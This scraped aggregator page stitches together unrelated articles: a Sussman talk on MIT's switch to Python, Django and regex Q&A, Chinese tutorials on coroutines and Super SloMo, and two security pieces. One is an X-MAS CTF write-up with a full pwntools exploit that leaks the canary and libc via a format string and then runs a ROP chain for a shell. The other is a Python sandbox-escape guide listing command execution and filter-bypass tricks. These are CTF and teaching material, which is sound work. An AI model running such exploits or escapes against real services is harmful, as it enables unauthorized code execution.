Quantcast
Channel: CodeSection,代码区,Python开发技术文章_教程 - CodeSec
Viewing all 9596 articles
Browse latest View live

Why MIT now uses python instead of scheme for it's intro to comp sci (2009)

$
0
0

This week, I find myself lucky enough to be at the International Lisp Conference at MIT in Cambridge, MA. I won’t get into why I’m here right now, for those of you who might be surprised. The purpose of this post is simply to paraphrase what Gerald Jay Sussman , one of the original creators of Scheme, said yesterday in an a brief impromptu talk about why the computer science department at MIT had recently switched to using python in its undergraduate program. This change is something that was widely panned when it was announced by many people all across the programming and computing world from various disciplines, so it seems worthwhile to try to document what Prof. Sussman said.

(The impromptu talk happened much after Monday’s formal talks and presentations, and I don’t think that anyone was recording Prof. Sussman’s remarks. If anyone does have a recording, by all means, post it, and I’ll link to it here ― and probably just drop my paraphrasing.)

This is all from memory, so I’ll just apologize ahead of time for any errors or misinterpretations I propagate. If anyone has any corrections, by all means, leave a comment (try to keep your debate reflex in check, though). In a couple of places, I’ve added notes in italics. Just to keep things simple and concise, the following is written in first-person perspective:

When we conceived of scheme in the 1970’s, programming was a very different exercise than it is now. Then, what generaly happened was a programmer would think for a really long time, and then write just a little bit of code, and in practical terms, programming involved assembling many very small pieces into a larger whole that had aggregate ( did he say ‘emergent’? ) behaviour. It was a much simpler time.

Critically, this is the world for which scheme was originally designed. Building larger programs out of a group of very small, understandable pieces is what things like recursion and functional programming are built for.

The world isn’t like that anymore. At some point along the way ( he may have referred to the 1990’s specifically ), the systems that were being built and the libraries and components that one had available to build systems were so large, that it was impossible for any one programmer to be aware of all of the individual pieces, never mind understand them. For example, the engineer that designs a chip, which now have hundreds of pins generally doesn’t talk to the fellow who’s building a mobile phone user interface.

The fundamental difference is that programming today is all about doing science on the parts you have to work with. That means looking at reams and reams of man pages and determining that POSIX does this thing, but windows does this other thing, and patching together the disparate parts to make a usable whole.

Beyond that, the world is messier in general. There’s massive amounts of data floating around, and the kinds of problems that we’re trying to solve are much sloppier, and the solutions a lot less discrete than they used to be.

Robotics is a primary example of the combination of these two factors. Robots are magnificently complicated and messy, with physical parts in the physical world. It doesn’t just move forward along the ground linearly and without interruption: the wheels will slip on the ground, the thing will get knocked over, etc.

This is a very different world, and we decided that we should adjust our curriculum to account for that. So, a committee ( here, Prof. Sussman peaked his hands over his head, which I interpreted to indicated pointy-headedness ) got together and decided that python was the most appropriate choice for future undergraduate education. Why did they choose python? Who knows, it’s probably because python has a good standard library for interacting with the robot.

That is my best paraphrasing of Prof. Sussman’s remarks. I spoke with him briefly earlier today, primarily to ask his permission for me to post this sort of first-person paraphrasing; he replied: “Sure, as long as you paraphrase me accurately.” Hopefully I succeeded; I’ll mention again my solicitation for corrections in the comments.

As a short addendum, while I had Prof. Sussman’s ear, I asked him whether he thought that the shift in the nature of a typical programmer’s world minimizes the relevancy of the themes and principles embodied in scheme. His response was an emphatic ‘no’; in the general case, those core ideas and principles that scheme and SICP have helped to spread for so many years are just as important as they ever were. However, he did say that starting off with python makes an undergraduate’s initial experiences maximally productive in the current environment. To that, I suggested that that dynamic makes it far easier to “hook” undergrads on “computer science” and programming, and retaining people’s interest and attracting people to the field(s) is a good thing in general; Prof. Sussman agreed with that tangential point.


Get an empty file when served by django

$
0
0

I have the following code for managing file download through django.

def serve_file(request, id): file = models.X.objects.get(id=id).file #FileField file.open('rb') wrapper = FileWrapper(file) mt = mimetypes.guess_type(file.name)[0] response = HttpResponse(wrapper, content_type=mt) import unicodedata, os.path filename = unicodedata.normalize('NFKD', os.path.basename(file.name)).encode("utf8",'ignore') filename = filename.replace(' ', '-') #Avoid browser to ignore any char after the space response['Content-Length'] = file.size response['Content-Disposition'] = 'attachment; filename={0}'.format(filename) #print response return response

Unfortunately, my browser get an empty file when downloading.

The printed response seems correct:

Content-Length: 3906 Content-Type: text/plain Content-Disposition: attachment; filename=toto.txt blah blah ....

I have similar code running ok. I don't see what can be the problem. Any idea?

PS: I have tested the solution proposed here and get the same behavior

Update: Replacing wrapper = FileWrapper(file) by wrapper = file.read() seems to fix the problem

Update: If I comment the print response , I get similar issue:. the file is empty. Only difference: FF detects a 20bytes size. (the file is bigger than this)

File object is an interable, and a generator. It can be read only once before being exausted. Then you have to make a new one, of use a method to start at the begining of the object again (e.g: seek() ).

read() returns a string, which can be read multiple times without any problem, this is why it solves your issue.

So just make sure that if you use a file like object, you don't read it twice in a row. E.G: don't print it, then returns it.

Python can not parse date with Regex

$
0
0

I have a program in which the user can enter a string and have the date in the string. I am using RegEx to match \d+\/\d+\/\d+ to extract the date from the string but for some reason in my test case, only the last entry is able to work

import datetime import re dateList = [] dates = ["Foo (8/15/15) Bar", "(8/15/15)", "8/15/15"] reg = re.compile('(\d+\/\d+\/\d+)') for date in dates: matching = reg.match(date) if matching is not None: print date, matching.group(1) else: print date, "is not valid date"

returns

Foo (8/15/15) Bar is not valid date (8/15/15) is not valid date 8/15/15 8/15/15

Is there something wrong with my RegEx? I tested it with RegEx101.com and it seemed to work fine

if you are looking for a partial match of the regex, use search:

import datetime import re dateList = [] dates = ["Foo (8/15/15) Bar", "(8/15/15)", "8/15/15"] reg = re.compile('([0-9]+/[0-9]+/[0-9]+)') for date in dates: matching = reg.search(date) # <- .search instead of .match if matching is not None: print( date, matching.group(1) ) else: print( date, "is not valid date" )

圣诞前夕X-MAS CTF一道有趣的web+pwn

$
0
0

圣诞前夕X-MAS CTF一道有趣的web+pwn
0x001 前言

最近空下来,做了一下X-MAS CTF的pwn题,题目质量很好,期间遇到一道web+pwn花了不少时间,主要从子进程调试、socket通信方面详细讨论如何解决这类基于socket服务的pwn题。

题目下载:

链接: https://pan.baidu.com/s/1G4L-B1rSydLRCJ-9Zcy9Ug 密码:wsxd

0x002 分析

题目给了一个基于socket的server(保护全开)以及libc.so


圣诞前夕X-MAS CTF一道有趣的web+pwn

把server跑起来,通过浏览器访问 http://localhost:1337 ,出现了这样一个页面,有点像web的画风,字面意思是:预留了了一个通过GET请求的接口


圣诞前夕X-MAS CTF一道有趣的web+pwn

多翻尝试,发现可以这样调用

/?toy=base64_string

比如说,请求 hello world 页面,传入 hello world 的base64编码 aGVsbG8gd29ybGQ=


圣诞前夕X-MAS CTF一道有趣的web+pwn

先测试一下有没有溢出,传入一个超长串的base64编码

/?toy=QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ==

网页直接崩掉,server的启动终端提示 stack smashing ,说明发生溢出了,但有canary,下面找找可以info leak的洞


圣诞前夕X-MAS CTF一道有趣的web+pwn
0x003 Bypass Canary

找到 route 函数,这里有一处fsb可以用于泄漏stack cookie


圣诞前夕X-MAS CTF一道有趣的web+pwn

下面说说调试方法:

一般的pwn题,直接通过socat起来,要调试的只有一个进程;对于socket服务,当接收到请求,会fork出来一个子进程,该子进程的内存空间布局与父进程一致,同理,这样多次会话泄漏出来的Canary也完全一致。直接在子进程代码中下断点,程序是不会断下的,需要先设置跟随子进程 set follow-fork-mode child 。

先在 route 处下断,设置跟随子进程,运行这段leak脚本

#! /usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
def _request(gift,fmt,ctl):
req = "GET /?toy={} HTTP/1.1rn".format(gift)
req += "User-Agent: {}rn".format(fmt)
s=remote("localhost",1337,level="error")
s.s(req)
try:
if not ctl:
return re.findall("<br>(.*?)</small>", s.recvall())[0][10:]
else:
return s.irt()
except EOFError:
return None
finally:
s.close()
def pwn():
leak = _request(b64e('wooy0ung'),'%p '*200,False).split(' ')
if __name__ == '__main__':
pwn()

现在段在了 printf 调用的地方,查看栈上该处便是 cookie


圣诞前夕X-MAS CTF一道有趣的web+pwn

查看内存布局,顺便把pie_base、libc_base泄漏出来


圣诞前夕X-MAS CTF一道有趣的web+pwn

对比基址,确定通过以下这几处可以泄漏 0x0000555555556006-0x0000555555554000 = 0x2006 、 0x00007ffff7a2d830-0x00007ffff7a0d000 = 0x20830


圣诞前夕X-MAS CTF一道有趣的web+pwn

换算一下,得到基址


圣诞前夕X-MAS CTF一道有趣的web+pwn
0x004 Stack overflow

关于溢出点,找了好久,server设置跟随子进程,跑一下这段poc

#! /usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
def pwn():
pl = "QWEwQWExQWEyQWEzQWE0QWE1QWE2QWE3QWE4QWE5QWIwQWIxQWIyQWIzQWI0QWI1QWI2QWI3QWI4"
pl += "QWI5QWMwQWMxQWMyQWMzQWM0QWM1QWM2QWM3QWM4QWM5QWQwQWQxQWQyQWQzQWQ0QWQ1QWQ2QWQ3"
pl += "QWQ4QWQ5QWUwQWUxQWUyQWUzQWU0QWU1QWU2QWU3QWU4QWU5QWYwQWYxQWYyQWYzQWY0QWY1QWY2"
pl += "QWY3QWY4QWY5QWcwQWcxQWcyQWczQWc0QWc1QWc= "
req = "GET /?toy={} HTTP/1.1rn".format(pl)
s=remote("localhost",1337,level="error")
s.s(req)
if __name__ == '__main__':
pwn()

子进程崩掉


圣诞前夕X-MAS CTF一道有趣的web+pwn

查看栈回溯,发现在 parse_query_string 开始崩的


圣诞前夕X-MAS CTF一道有趣的web+pwn

重新跟随子进程,停在 base64decode 函数调用的地方


圣诞前夕X-MAS CTF一道有趣的web+pwn

先查看一下栈内容,现在是正常的


圣诞前夕X-MAS CTF一道有趣的web+pwn

base64decode 调用返回后,栈被覆盖了,通过对比正常的栈内容,得到stack_cookie的偏移 0x928-0x8e0 = 0x48


圣诞前夕X-MAS CTF一道有趣的web+pwn

查看函数 base64decode 的代码,最后确认溢出点在这里,a2是在调用 base64decode 传入的一个局部数组


圣诞前夕X-MAS CTF一道有趣的web+pwn

查看栈布局,a2的缓冲区大小只有0x48,当越界了就会发生溢出


圣诞前夕X-MAS CTF一道有趣的web+pwn
0x005 ROP

现在已经分析完了,下面就是常规栈溢出的做法了,只是要注意现在是在socket服务下的利用,还需要将标准输入、输出重定向到sockfd,可以这样构造rop chain

#1.Smash stack bypass
pl = ''
pl += 'a'*0x48
pl += p64(stack_cookie)
#2.Call dup2(4,1) [out]
pl += p64(ret)*4
pl += p64(rdi)
pl += p64(4)
pl += p64(rdx_rsi)
pl += 'a'*8
pl += p64(1)
pl += p64(libc.sym['dup2'])
#3.Call dup2(4,0) [in]
pl += p64(ret)*4
pl += p64(rdi)
pl += p64(4)
pl += p64(rdx_rsi)
pl += 'a'*8
pl += p64(0)
pl += p64(libc.sym['dup2'])
#4.Call system('/bin/sh')
pl += p64(ret)
pl += p64(libc.address+0x45216)
pl.rjust(200,'x00')

完整的EXP

#! /usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import os, sys
import requests
import re
DEBUG = 4
context.arch = 'amd64'
context.log_level = 'debug'
elf = ELF('./server',checksec=False)
# synonyms for faster typing
tube.s = tube.send
tube.sl = tube.sendline
tube.sa = tube.sendafter
tube.sla = tube.sendlineafter
tube.r = tube.recv
tube.ru = tube.recvuntil
tube.rl = tube.recvline
tube.ra = tube.recvall
tube.rr = tube.recvregex
tube.irt = tube.interactive
if DEBUG == 1:
libc = ELF('/root/workspace/expmake/libc_x64',checksec=False)
s = process('./toy')
elif DEBUG == 2:
libc = ELF('/root/workspace/expmake/libc_x64',checksec=False)
s = process('./toy', env={'LD_PRELOAD':'/root/workspace/expmake/libc_x64'})
elif DEBUG == 3:
libc = ELF('/root/workspace/expmake/libc_x64',checksec=False)
ip = 'localhost'
port = 1337
s = remote(ip,port)
elif DEBUG == 4:
libc = ELF('/root/workspace/expmake/libc_x64',checksec=False)
def _request(gift,fmt,ctl):
req = "GET /?toy={} HTTP/1.1rn".format(gift)
req += "User-Agent: {}rn".format(fmt)
s=remote("localhost",1337,level="error")
s.s(req)
try:
if not ctl:
return re.findall("<br>(.*?)</small>", s.recvall())[0][10:]
else:
return s.irt()
except EOFError:
return None
finally:
s.close()
def pwn():
leak = _request(b64e('wooy0ung'),'%p '*200,False).split(' ')
#print leak
pie_base = int(leak[0], 16) - 0x2006 # 0x0000555555556006-0x0000555555554000 = 0x2006
stack_cookie = int(leak[6], 16)
libc.address = int(leak[36],16) - 0x20830 # 0x7ffff7a2d830-0x00007ffff7a0d000 = 0x20830
info("0x%x pie_base",pie_base)
info("0x%x stack_cookie",stack_cookie)
info("0x%x libc.address",libc.address)
'''
pl = "QWEwQWExQWEyQWEzQWE0QWE1QWE2QWE3QWE4QWE5QWIwQWIxQWIyQWIzQWI0QWI1QWI2QWI3QWI4"
pl += "QWI5QWMwQWMxQWMyQWMzQWM0QWM1QWM2QWM3QWM4QWM5QWQwQWQxQWQyQWQzQWQ0QWQ1QWQ2QWQ3"
pl += "QWQ4QWQ5QWUwQWUxQWUyQWUzQWU0QWU1QWU2QWU3QWU4QWU5QWYwQWYxQWYyQWYzQWY0QWY1QWY2"
pl += "QWY3QWY4QWY5QWcwQWcxQWcyQWczQWc0QWc1QWc= "
req = "GET /?toy={} HTTP/1.1rn".format(pl)
s=remote("localhost",1337,level="error")
s.s(req)
'''
ret = pie_base + 0x0000000000000c4e
rdi = pie_base + 0x0000000000001d9b
rsi_r15 = pie_base + 0x0000000000001d99
rdx_rsi = libc.address + 0x00000000001150c9
#1.Smash stack bypass
pl = ''
pl += 'a'*0x48
pl += p64(stack_cookie)
#2.Call dup2(4,1) [out]
pl += p64(ret)*4
pl += p64(rdi)
pl += p64(4)
pl += p64(rdx_rsi)
pl += 'a'*8
pl += p64(1)
pl += p64(libc.sym['dup2'])
#3.Call dup2(4,0) [in]
pl += p64(ret)*4
pl += p64(rdi)
pl += p64(4)
pl += p64(rdx_rsi)
pl += 'a'*8
pl += p64(0)
pl += p64(libc.sym['dup2'])
#4.Call system('/bin/sh')
pl += p64(ret)
pl += p64(libc.address+0x45216) # one_gadget
pl.rjust(200,'x00')
_request(b64e(pl),'',True)
if __name__ == '__main__':
pwn()

WIN~


圣诞前夕X-MAS CTF一道有趣的web+pwn

A year of almost blogging

$
0
0

2019 is around the corner and I am looking at how many blog posts I wrote this year and the number is a resounding zero. On the other hand, looking in my drafts folder, I see quite a few posts in various stages of writing , I even think some of them are interesting :), Here are a few exampls :

Extract, Anonymize, Transform Load is the new ELT One of the major design decision in the current platform we’re developing today is to handle and isolate all PII (and PHI) as early as possible in the ingestion pipeline and build the rest of the system on de-identified data. This post would have explained how and what we’re doing and why it is important The woes of pySpark I’ve been using Spark since mid-2014, i.e., v1, but only using it via the JVM (mostly using Scala) and it sure wasn’t a fun ride all the time (e.g., here read this 2014 post on how fun it was to use parquet files back then). This year I began using it with python, and that felt like going back in time. First, there were the problems of using it with Pandas ( spark 2.3 made that a lot easier but it wasn’t until the end of Junethat it made it to GCP’s cloud dataproc ) and that’s that was the easy part. The main problem with pySpark is to tune jobs so that they complete when going from toy sample to big data. I wanted to round up some insights I gathered while fighting Spark on this How we’ve built our data ingestion and model creation pipeline on Kubernetes Apropos the previous point, we managed to cut down our execution time and compute resources significantly (from several hours of 100 servers to < 30 min with about 20) by breaking our pipeline to do minimal preparations in Spark and handling the bulk of the work as queued jobs on Kubernetes. I thought that would be interesting to explain what we did there Creating services. It isn’t just carving the monolith Whenever I read a write-up on micro-services, it never fails to irk me how it is always monoliths and micro-services like there’s nothing else in between. I began writing this note that you can also evolve services to new services and various other architectures. Docker for testing Another pet peeve I have is with the “test pyramid”, the thinking that the right way is to have lots and lots of unit tests some integration tests and few unit tests. I think it should be a “test rhombus”, esp. in a world of micro-services where the interactions are what makes the system and the testing surface of each service is relatively small. Anyway, a lot what’s bad in unit tests is the whole mocking and faking thing, esp. of infrastructure which makes the software more complex and the test ickier. Docker can save that you can run your dependencies as docker images and use them. Both the JVM and Python (the two eco-systems I’m mostly using) have the testing libs support for integrating with docker (run images before test start and clean up afterward) so tests can also operate in build environments and not just on the devs laptops. Using KeyCloak for authentication and authorization when delivering a SaaS solution there are many online services that manage authorization for you (like okta, auth0, etc.) when it comes to on-prem, the options are more limited. Having implemented security solutions in the past, I know I don’t want to do that again. Then I found RedHat’s KeyCloak currently in v.4.8.1, open source, themeable, works out of the box with minimal configuration and integrates easily (with Angular and Python in my case). I was going to write how we’re using its JWT tokens for both authentication and authorizati on Kubernetes, Git and integration environment per feature We are building software using Kanban and monthly release trains. To support that we’ve developed a CI/CD pipeline that integrates with our project management software ( TargetProcess ) and creates git branches and integration environments automatically (thanks to Nader Ganayem and Dotan Spector who did all the work) I think both the technical and dev management aspects are interesting

I don’t know if there are any readers left for this blog as it has been dormant for so long, but, instead of looking at this as missed blogging opportunities, I’ll treat this as a new year’s resolution to turn at least some of this list into posts

人工智能时代,我用Python写了一个智能机器人来聊天,非常不错!

$
0
0

人工智能时代,我用Python写了一个智能机器人来聊天,非常不错!

人工智能已是趋势,智能酒店,智能网吧,无人驾驶等等都已经实现,过不了多久,就会普及我们的生活圈子;同样,智能时代的来临意味着很多人将会面临失业。我们要跟着时代的发展前进,这样,我们才不会被时代所抛弃,所淘汰!

而作为人工智能的首选语言――python

将会是我们学习的首选目标;有人说过一句话:

在近后的社会中,不会python的人将会被列为新“文盲”! 而且python也是最适合没有任何编程语言基础的人学习!所以我开始了python的学习之旅!

只要你找对步骤,找对方法,认真学习!相信我,很快你就能学会!

这里,小编给大家准备的一份很适合零基础入门学习资料提供给想学习的人,当然还有今天的源码

获取方式:关注!转发!然后私信小编【01】即可。

好了,今天小编给大家带来的是写一个智能的机器人:

一. 剖析一下生成器对象

先看一个简单的例子,我们创建一个生成器函数,然后生成一个生成器对象


人工智能时代,我用Python写了一个智能机器人来聊天,非常不错!

人工智能时代,我用python写了一个智能机器人来聊天,非常不错!

表示G是一个生成器对象,我们来剖析一下,里面到底有什么

print dir(G)
人工智能时代,我用Python写了一个智能机器人来聊天,非常不错!

大家注意看有4个很特殊的函数close(),next(),send(),throw(),next()函数前面两篇文章讲过了,我就不再说.今天我们就重点来说说send(),throw(),close()函数

二. 什么是协程

Python的协程有点类似线程,可以认为协程是一种用户级的轻量级线程或者微线程,可以运行多个函数,让这几个函数看起来好像是在同一时间运行,但是比线程有一些优点,比如不用大量占内存,开销小,也不用考虑线程安全.(关于什么是线程后面文章会讲)

1.send()函数

send()用于传递参数,实现与生成器的交互,当程序运行到receive=yield的时候 就会被挂起,等待生成器调用send方法,这个时候外部调用send函数,发送数据变量进来,数据变量就会传递到received

示例代码:


人工智能时代,我用Python写了一个智能机器人来聊天,非常不错!

a).echo函数里面一个死循环,里面有一行关键的代码,receive=yield 这个就是send函数从外部发送过来的入口.

b).外部函数一开始要生成一个生成器对象也就是Echo=echo()

c).然后很关键的一步就是next(Echo),一定要调用一次next函数,让生成器推进到第一条yield表达式那边

d).接下来我们就可以把yield操作和send操作结合起来,可以获取外界所输入的数据,然后用一套流程去进行处理

2.throw()函数

throw主要是向生成器发送一个异常,可以结束系统定义的异常(当然包括自定义的异常)

示例代码:


人工智能时代,我用Python写了一个智能机器人来聊天,非常不错!

a).创建生成器对象G

b),执行next(G)并打印结果,我们会得到第一个yield里缓存的结果'First', 并且停留在yield 'Second'之前

c).抛出一个异常类ValueError(注意ValueError是类不是字符串),当生成器收到 异常直接跳过 yield 'Second'进入except部分,打印出'Catch the TypeError'

d).执行next(G)并打印结果,我们会回到while头部,并且消耗掉第一个yield 'Frist',执行yield 'Second'

3.close()函数

close用于停止生成器,如果停止之后再调用next,就会引发StopIteration错误

示例代码:


人工智能时代,我用Python写了一个智能机器人来聊天,非常不错!

当生成器对象Echo调用完close()之后,再调用send('123')就会抛出一个异常StopIteration,然后被我们捕捉到了

三. 实战应用-迷你聊天机器人

讲了这么多,大家是不是有点晕,

生成器本身就是Python里面最复杂的概念之一,有同学问难道还有之二(是的,就是装饰器)

,我们用协程写一个小的聊天机器人吧~~

1).创建一个聊天机器人生成器函数,可以认为是后台的一个线程函数


人工智能时代,我用Python写了一个智能机器人来聊天,非常不错!

2).前台不断的获取用户的输入,然后利用协程发送给后台处理


人工智能时代,我用Python写了一个智能机器人来聊天,非常不错!

看一下运行的效果


人工智能时代,我用Python写了一个智能机器人来聊天,非常不错!

【责任编辑:庞桂玉 TEL:(010)68476606】

让普通视频变成慢动作:「AI加帧」技术现已开源

$
0
0

今年 6 月份,英伟达发布了一篇生成高质量慢动作视频的论文――《Super SloMo: High Quality Estimation of Multiple Intermediate Frames for Video Interpolation》,探讨了如何将普通设备录制的视频转换为高帧率慢动作视频。这项工作的原理是在临近的两帧之间补充额外的画面帧。让我们先来看一下效果:


让普通视频变成慢动作:「AI加帧」技术现已开源

额... 英伟达给出的视频中展示了一个用网球拍快速打破水球的例子,正常速度下的视频如下:


让普通视频变成慢动作:「AI加帧」技术现已开源

下图分别是用原始 SloMo 和 Super SloMo 软件制作的慢速视频。


让普通视频变成慢动作:「AI加帧」技术现已开源

从图中可以可出,用原始 SloMo 软件制作出的慢速视频虽然也让我们看到了一些肉眼无法捕捉到的细节,但相比之下,用 Super SloMo 制作的慢速视频还原的细节更多,画面也更加流畅。这是因为二者有着本质的区别,前者并没有生成新的视频帧,而后者则利用神经网络生成了新的视频帧,使得画面包含的帧数更多,从而增加了视频细节和流畅度。

在看看下方的赛车甩尾,原视频为 30FPS。看起来没毛病吧,那慢速播放之后呢?


让普通视频变成慢动作:「AI加帧」技术现已开源

看下图上方,原来流畅的甩尾变得像是一张张照片摆拍凑出来的定格动画(P 水花比甩尾简单多了吧),但经过算法补帧变成 240FPS 之后,下方的片段立刻有了 Fast & Furious 即视感。


让普通视频变成慢动作:「AI加帧」技术现已开源

遗憾的是,作者发布论文的时候并没有放出数据集和代码,让想要实现这一炫酷技术的 geek 们大失所望。但是(划重点),群众的力量是伟大的。近日,GitHub 一位名为 avinashpaliwal 的用户开源了自己对 Super SloMo 的 PyTorch 实现:

Github 地址:https://github.com/avinashpaliwal/Super-SloMo

Super SloMo 的 PyTorch 实现 结果

使用作者提供的评估脚本在 UCF101 数据集上的结果。用的脚本是 et_results_bug_fixed.sh。它在计算 PSNR、SSIM 和 IE 时使用了运动掩码(motions mask)。

先决条件

该代码库是用 pytorch 0.4.1 和 CUDA 9.2 进行开发测试的。

训练

准备训练数据

要使用提供的代码训练模型,首先需要以某种方式格式化数据。

create_dataset.py 脚本使用 ffmpeg 从视频中提取帧。

至于 adobe240fps,下载下面这个数据集,解压并运行以下命令:

python data\create_dataset.py --ffmpeg_dir path\to\ffmpeg --videos_folder path\to\adobe240fps\videoFolder --dataset_folder path\to\dataset --dataset adobe240fps

数据集:http://www.cs.ubc.ca/labs/imager/tr/2017/DeepVideoDeblurring/DeepVideoDeblurring_Dataset_Original_High_FPS_Videos.zip

评估

预训练模型

你可以从以下地址下载在 adobe240fps 数据集上训练的预训练模型:

https://drive.google.com/open?id=1IvobLDbRiBgZr3ryCRrWL8xDbMZ-KnpF

这个模型怎么玩才好玩呢?拿出过去渣手机拍摄的珍藏片段,慢动作回放一下是不是更有味道?


让普通视频变成慢动作:「AI加帧」技术现已开源

那些为自制电影设备费用发愁的是不是来劲了?


让普通视频变成慢动作:「AI加帧」技术现已开源

还有,那些每次一到高速战斗情节就经费严重不足的动画制作组是不是觉得相见恨晚?


让普通视频变成慢动作:「AI加帧」技术现已开源
让普通视频变成慢动作:「AI加帧」技术现已开源

有了它,一些动画是不是能多更新半年了?


让普通视频变成慢动作:「AI加帧」技术现已开源
论文
让普通视频变成慢动作:「AI加帧」技术现已开源

项目链接:https://people.cs.umass.edu/~hzjiang/projects/superslomo/

论文链接:https://arxiv.org/pdf/1712.00080.pdf

摘要:给定两个连续的帧,视频插值旨在生成中间帧,以形成空间和时间相干的视频序列。大多已有的方法都集中于单帧插值上,本文提出了一种用于可变长度多帧视频插值的端到端卷积神经网络,其中运动解释(motion interpretation)和遮挡推理(occlusion reasoning)是联合建模的。该研究从使用 U-Net 架构计算输入图像之间的双向光流开始。随后,这些流在每个时间步被线性组合,以近似中间双向光流。然而,这些近似流仅在局部平滑区域有用,且在运动边界周围产生伪影。

为了解决这个不足,作者利用另一个 U-Net 来细化近似流并预测软可视图(soft visibility map)。最终,两个输入图像被变形并线性融合以形成每个中间帧。通过在融合之前把可视图应用于变形的图像上,作者排除了遮挡像素对插值中间帧的贡献,以避免伪影。由于所学到的网络参数都不依赖于时间,所以本文的方法能够根据需要产生很多中间帧。作者使用 1132 个每秒 240 帧的视频片段(包含 30 万个单独的视频帧)来训练其网络。在多个数据集上的实验(预测不同数量的插值帧)结果表明本文的方法比现有的方法性能更好。

方法

研究者使用了光流插值的方法来合成中间帧,基于两个关键要素:时间一致性和遮挡推断。

时间一致性是指:中间帧 I_t 可以通过初始帧 I_0 结合光流(optic flow,F)的转换 g() 而成,也可以通过结束帧 I_1 结合光流 F 转换而成,一般形式是两者的线性组合。


让普通视频变成慢动作:「AI加帧」技术现已开源

一般而言,随着时间流动,I_t 的图像特征会从更接近 I_0 变得更接近 I_1,所以α_0 应该是 t 的线性函数(不考虑遮挡时)。当 t=0 时,α_0=1;当 t=1 时,α_0=0。

如图 2 所示:


让普通视频变成慢动作:「AI加帧」技术现已开源

图 2:光流插值结果的示例,其中 t=0.5。完整的场景向左移动(摄像头平移),摩托车也向左移动。最后一行展示了光流插值CNN 的微调主要在运动边界处进行(像素越白,微调程度越高)。

遮挡推断是指:在 I_0 中出现的像素(或物体),在 I_1 中可能不出现,反之亦然。那么就要考虑 I_t 在遮挡情况下对两个输入帧的权重,用可视图(visibility maps,V)表示。

所以,最终的中间帧合成等式为(Z 是归一化因子):


让普通视频变成慢动作:「AI加帧」技术现已开源

如图 3 所示:


让普通视频变成慢动作:「AI加帧」技术现已开源
让普通视频变成慢动作:「AI加帧」技术现已开源
图 3:预测可视图的样本,其中 t=0.5。运动员的手从 T=0 到 T=1 往上举。因此手臂右上方区域在 T=0 时是可见的,在 T=1 时是不可见的(被遮挡)。第四行的可视图清晰地展示了这个现象。V_t←0 中手臂周围的白色区域表示 I_0 中的这些像素对合成I_t 的贡献最大,黑色区域表示这些像素对合成I_t 的贡献最小。V_t←1 也是同样的道理。

由于中间帧本身是需要预测的,不是预先存在的,因此需要用 I_0 和 I_1 之间的光流对 I_t 和 I_0、I_1 之间的光流进行近似:


让普通视频变成慢动作:「AI加帧」技术现已开源

此外关于遮挡推断,同样很自然地假设:当 t 接近 0 的时候,I_t 更接近 I_0;当 t 接近 1 的时候,I_t 更接近 I_1。


让普通视频变成慢动作:「AI加帧」技术现已开源

所以,最终的架构设计如下:其分为两个阶段,第一个阶段将 I_0、I_1 输入到光流计算 CNN 中,得到两者之间正向和反向的光流;第二个阶段再以 I_0 和 I_1 之间的光流、I_0 和 I_1、I_0 和 I_1 到 I_t 的变换函数、I_0 和 I_1 到 I_t 的近似光流为输入,得到可视图以及 I_0 和 I_1 到 I_t 的近似光流的增量。结合这些量,就可以直接算出最终的 I_t,如下图所示。


让普通视频变成慢动作:「AI加帧」技术现已开源

损失函数分为四个项:重建损失(Reconstruction loss),合成帧和数据集中间帧的 L1 损失;感知损失(perceptual loss),减少图像模糊;转换损失(Warping loss.),图像帧和经其它帧光流变换输出之间的 L1 损失;平滑度损失(Smoothness loss),限制光流函数的梯度。


让普通视频变成慢动作:「AI加帧」技术现已开源
图 9:主要 CNN 架构为 U-Net。
让普通视频变成慢动作:「AI加帧」技术现已开源

图 8:在高帧数 Sintel 数据集上生成 31 张中间帧时每个时间步的 PSNR 值对比。

读者还可以查看论文在 CVPR 2018 spotlight video 的论文讲解:

Python Sandboxie Escape 沙盒绕过

$
0
0
前言

在 SSTI 服务端模版注入中,已经接触到了python沙箱逃逸的方法。其命令执行本质上可以理解为一种沙箱绕过,它和Python沙箱绕过的方法是通用的。

Python沙箱

Python语言机制或解释器本身没有沙箱,这里所说的“沙箱”是类似一些网站提供在线Python脚本执行,而又不想用户直接使用Python执行系统命令对系统造成危害,而对Python的一个“阉割”版本。被“阉割”的版本删去了命令执行,服务器文件读写等相关函数或文件。

沙箱逃逸思路

对于Python的沙箱逃逸而言,实现目的的最终想法如下:

使用 os 包中 的 popen , system 两个函数来直接执行shell 使用 commands 模块中的方法 使用 subprocess 使用写文件到指定位置,再使用其他辅助手段 import os import subprocess import commands # 直接输入shell命令,以ifconfig举例 os.system('ifconfig') os.popen('ifconfig') commands.getoutput('ifconfig') commands.getstatusoutput('ifconfig') subprocess.call(['ifconfig'],shell=True) import 关键字过滤

在一些CTF中,经常会过滤一些import包的关键字,这样就不能直接利用 os 等包进行命令执行了。如果关键字被过滤,如 sys , os , commands , subprocess 等被过滤。可以对原始关键字进行各种加密解密来绕过关键字检测。如果面临的沙盒不能导入任何包,那可能就是 import 关键字被过滤了。可以尝试使用如下方式来绕过 :

__import__函数 res = __import__("pbzznaqf".decode('rot_13')) res.getoutput('ifconfig') importlib库 import importlib res = importlib.import_module("pbzznaqf".decode('rot_13') print res.getoutput('ifconfig') 加密解密绕过字符串过滤 >>> import base64 >>> base64.b64encode('__import__') 'X19pbXBvcnRfXw==' >>> base64.b64encode('os') 'b3M=' [x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0].__init__.func_globals['linecache'] .__dict__['o'+'s'].__dict__['sy'+'stem']('id')
Python Sandboxie Escape 沙盒绕过
根对象与继承树

回顾Python中的一些特殊方法:

__class__ 返回调用的参数类型

__class__ 返回基类

